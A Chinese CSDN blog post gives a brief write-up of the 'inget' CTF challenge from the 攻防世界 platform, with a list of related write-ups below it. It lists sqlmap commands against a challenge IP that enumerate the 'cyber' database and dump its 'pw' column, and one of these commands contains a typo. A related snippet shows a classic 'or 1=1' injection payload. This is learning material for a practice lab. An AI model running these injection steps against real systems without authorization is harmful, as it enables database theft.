攻防世界 inget

最新推荐文章于 2024-05-13 10:53:15 发布

山里灵活的狗狗

最新推荐文章于 2024-05-13 10:53:15 发布

阅读量1.2k

点赞数 1

分类专栏：攻防世界(个人笔记) 文章标签： web安全

本文链接：https://blog.csdn.net/zhongjl666/article/details/127135530

版权

攻防世界(个人笔记) 专栏收录该内容

14 篇文章 0 订阅

订阅专栏

这是一道sql注入的题目

可以使用kali上面的sqlmap

查询数据库类型
sqlmap -u "http://61.147.171.105:58130/index.php/?id=1" --current-db

显示某数据库下面的所有表
sqlmap -u "http://61.147.171.105:58130/index.php/?id=1" -D cyber --cyber

显示某数据库某表下面的所有字段
sqlmap -u "http://61.147.171.105:58130/index.php/?id=1" -D cyber -T cyber --columns

获取字段值
sqlmap -u "http://61.147.171.105:58130/index.php/?id=1" -D cyber -T cyber -C"pw" --dump

安装上面的步骤一个一个输入,即可获得flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

山里灵活的狗狗

关注关注

1
点赞
踩
2

收藏

觉得还不错? 一键收藏
0
评论
攻防世界 inget

攻防世界 inget
复制链接

扫一扫

专栏目录

攻防世界-inget（简单的SQL注入、万能密码）

Welcome To Myon'Blog !

04-14

4834

inget（简单的SQL注入）、手工注入、万能密码原理、sqlmap实现、常用参数

攻防世界新手区部分web wp 2

fcz___的博客

02-09

1294

攻防世界web新手区部分wp

参与评论您还未登录，请先登录后发表或查看评论

【攻防世界】CTF 网络安全学习180天之 inget_please enter id,and try to bypass

最新发布

2401_84520245的博客

05-13

621

在结束之际，我想重申的是，学习并非如攀登险峻高峰，而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后，持之以恒的学习变得愈发不易，如同在茫茫大海中独自划舟，稍有松懈便可能被巨浪吞噬。然而，对于我们程序员而言，学习是生存之本，是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习，我们便如同逆水行舟，不进则退，终将被时代的洪流所淘汰。因此，不断汲取新知识，不仅是对自己的提升，更是对自己的一份珍贵投资。让我们不断磨砺自己，与时代共同进步，书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。

攻防世界-Web-inget新手

wangwei011的博客

05-16

1174

攻防世界-Web-inget

攻防世界inget

qq_55510415的博客

04-22

526

现在传入id=1' or 1=1-- -就变成了'id=1' or 1=1-- -',id=1或者1=1返回都是true，-- abc表示注释后面代码。由此可获得flag。对url进行修改添加/?原本当传入id的时候例如id=1就是'id=1'思路：通过id进行sql注入。请输入ID，并尝试绕过。

攻防世界-inget

m0_62094846的博客

10-06

1239

看到说id，可能id是参数，尝试了几个数，页面都没有变化，也没有延时回显。看了wp，确实是sql注入，注入点是id，用sqlmap扫就可以出来。源代码里没有东西，御剑之类的也扫不到。

攻防世界

handuoduo123的博客

12-05

962

攻防世界新手题 misc 前5道不得不说，这道题真的是入门级别了。答案就在题目中，复制粘贴就好 flag{th1s_!s_a_d4m0_4la9} 下载完题目是一张动态图隐约可以看到有个缺少定位符的二维码隐约可以看到有个缺少定位符的二维码利用PS把二维码补全（随意扣一张二维码的定位符就好了）工具扫描得到flag{e7d478cf6b915f50ab1277f78502a2c5} 下载...

攻防世界2

Q221022的博客

04-22

556

工业协议分析2 下载文件发现是.pcapng文件，用Wireshark打开发现有很多UDP，SSDP,ARP的流量包，数量最多的是UDP的流量包，所以先对UDP的流量包进行分析，分析之后，注意到有很多长度相等的流量包，一共出现的长度分别为16 17 12 14 10 18 19 20 22 25 32 89 95 104 105 116 131 137 524 528，其中12，89，104，105，131，137长度的只出现一次，所以，猜测应该是这些流量包数据发生异常，仔细分析过这些之后，发现1

m box 2 mini 驱动

11-08

"M Box 2 Mini" 是一款小型的数字音频接口设备，主要用在音乐制作、录音室以及个人电脑音乐创作中。驱动程序是使硬件设备与操作系统相互通信的关键软件，对于M Box 2 Mini来说，驱动的重要性不言而喻。...

攻防世界：inget&php_rce&Web_php_include&unserialize3

weixin_74473832的博客

03-15

675

查了一下str.replace (old, new max]) 有三个参数，old是需要替换的值，new是替换后的值，max是最多替换的次数。这里的意思大概就是要用get方式提交一个page参数，但是会过滤掉page的值里面的php://。代码的意思大概是有一个xctf的类，会调用wakeup魔术方法，然后会回显bad requests。根据题目说的php-rce，去浏览器搜索这个版本的thinkphp框架的历史命令执行漏洞。这里用的是or，前后关系中只要一个对的，这个关系式就是真的，所以成功绕过。

[攻防世界]-Web:inget解析

2301_79326813的博客

01-28

518

查看网页很明显，他是要我们输入id这里我尝试了直接爆破，没有成功。

从题目inget的解决到注释符#和--的区别及用法

2301_77004573的博客

04-26

354

**使用本题的核心工具——翻译器（bushi）: 根据提示，明确了方向：sql注入 ID传参方式一般是GET（如果不是就用hackbar给url传参）接着尝试一下符号是否闭合：猜测闭合，接着尝试万能钥匙：成功获得flag。答：对用户提交的表单进行验证时，网站需要查询数据库。而查询数据库就是在执行SQL语句。用户登录时，不妨假定后台执行的数据库查询操作（SQL语句）是：Select ID From users Where ID=’用户名’ 。又由于网站后台在进行数据库查询的时候没有对单引号进行过滤，

攻防世界WEB练习-inget

热门推荐

不知名白帽的博客

09-01

1万+

攻防世界WEB练习-inget

攻防世界inget（sqlmap方法）

2302_78972359的博客

05-05

755

加上id，--dbs是用来爆数据库的，查看当前数据使用的数据库，中间可能会有提示，输入y即可。确实是sql注入，我用的是sqlmap，也可以在url构造，与sqlmap同理。这里我们查看第一个数据库cyber，输入指令,可以查看cyber库下的表名。可以看到cyber库下就一个表，也叫cyber，输入指令查看表内字段。cyber表内有三个字段，首先怀疑这个pw，查看字段内容，输入指令。打开虚拟机，终端输入sqlmap，如果是以下页面则说明可用。这个id是我们测试的参数，如果没这个id的话会像这样报错。

【网络安全 | CTF】攻防世界 inget 解题详析

等风来

07-23

4255

由于该语句为真，却无回显，故可排除数字型注入。语句，再根据回显做下一步判断。思路：尝试利用or构造。使用sqlmap爆数据。

【攻防世界】CTF 网络安全学习180天之 inget

Bing_Geng的博客

11-15

634

综合的考察了SQL注入绕过，且提示较其他难度为1的题目较少，是一个学习SQL注入的入门经典例题

攻防世界web新手区刷题

m0_64583632的博客

11-22

689

攻防世界新手区随机刷题file_include、easyphp、inget、fakebook、Web_python_template_injection

攻防世界：web区get_post

Zeker62的博客

08-14

228

考察一个页面如何手动提交get方法传参和post方法传参 get方法直接再浏览器中的url链接中输入/?a=1即可，而post方法则需要借助hackbar工具进行post传参，如下图所示：

攻防世界-宜兴网信办-inget

m0_49025459的博客

12-23

1028

题目访问题目路径这个题目的意思就是请输入ID，然后尝试绕过，那应该就是SQL注入，但是呢，我是个懒狗，我直接跑sqlmap先跑数据库名爆表爆字段爆数据。